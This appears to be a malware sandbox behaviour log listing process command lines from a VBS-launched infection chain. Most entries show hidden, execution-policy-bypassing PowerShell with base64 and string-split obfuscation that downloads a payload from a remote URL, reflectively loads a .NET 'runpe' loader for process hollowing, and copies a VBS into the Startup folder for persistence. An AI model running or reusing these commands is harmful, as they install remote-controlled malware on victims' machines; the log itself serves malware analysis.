Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2